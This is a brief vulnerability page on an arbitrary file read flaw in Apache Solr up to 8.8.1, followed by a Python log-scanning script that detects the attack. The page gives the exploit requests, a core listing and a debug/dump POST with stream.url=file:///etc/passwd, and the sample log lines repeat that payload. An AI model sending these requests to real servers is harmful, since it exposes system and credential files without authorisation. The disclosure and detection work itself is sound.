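Apache Solr arbitrary file read
Affected versions
Apache Solr <= 8.8.1
Access the following link to confirm that the vulnerability exists and to obtain the application name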
http://example.com/solr/admin/cores?indexInfo=false&wt=json
Submit a POST request to trigger the vulnerability
http://example.com/solr/<application name>/debug/dump?param=ContentStreams
POST:
stream.url=file:///etc/passwd
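
Detection for the two requests above, as an added example that is not part of the original page: it scans request-log lines for the core listing call and for /debug/dump requests carrying a file: stream.url, decoding percent-encoding first. The log layout (NCSA-style with the form body as a final quoted field, as a proxy or WAF might record it), the sample lines, the core name "demo" and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines: NCSA-style request log with the form body appended
# as a final quoted field (assumed proxy/WAF logging, not Solr's default format).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 512 "-"',
    '10.0.0.5 - - [01/Jan/2021:10:00:03 +0000] "POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1" 200 2048 "stream.url=file:///etc/passwd"',
    '10.0.0.9 - - [01/Jan/2021:10:02:00 +0000] "POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1" 200 1999 "stream.url=file%3A%2F%2F%2Fetc%2Fpasswd"',
    '10.0.0.7 - - [01/Jan/2021:10:05:00 +0000] "GET /solr/demo/select?q=*:*&wt=json HTTP/1.1" 200 900 "-"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)
DUMP_PATH_RE = re.compile(r'^/solr/[^/]+/debug/dump/?$')
CORES_PATH = '/solr/admin/cores'


def classify(line):
    """Return (client_ip, finding) for a line worth reviewing, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['uri'])
    params = parse_qs(url.query)  # percent-decodes names and values
    if m['body'] != '-':
        # Solr accepts parameters from the form body as well as the query string.
        for key, values in parse_qs(m['body']).items():
            params.setdefault(key, []).extend(values)
    if DUMP_PATH_RE.match(url.path):
        if any(v.lower().startswith('file:') for v in params.get('stream.url', [])):
            return m['ip'], 'file-read'            # high confidence
        if 'ContentStreams' in params.get('param', []):
            return m['ip'], 'dump-contentstreams'  # body not logged: review
    if url.path == CORES_PATH and params.get('indexInfo') == ['false']:
        return m['ip'], 'core-listing'             # low signal, context only
    return None


def scan(lines):
    """Return all findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]
```

A core-listing hit on its own is normal admin traffic; it matters when the same client follows it with a dump-contentstreams or file-read hit.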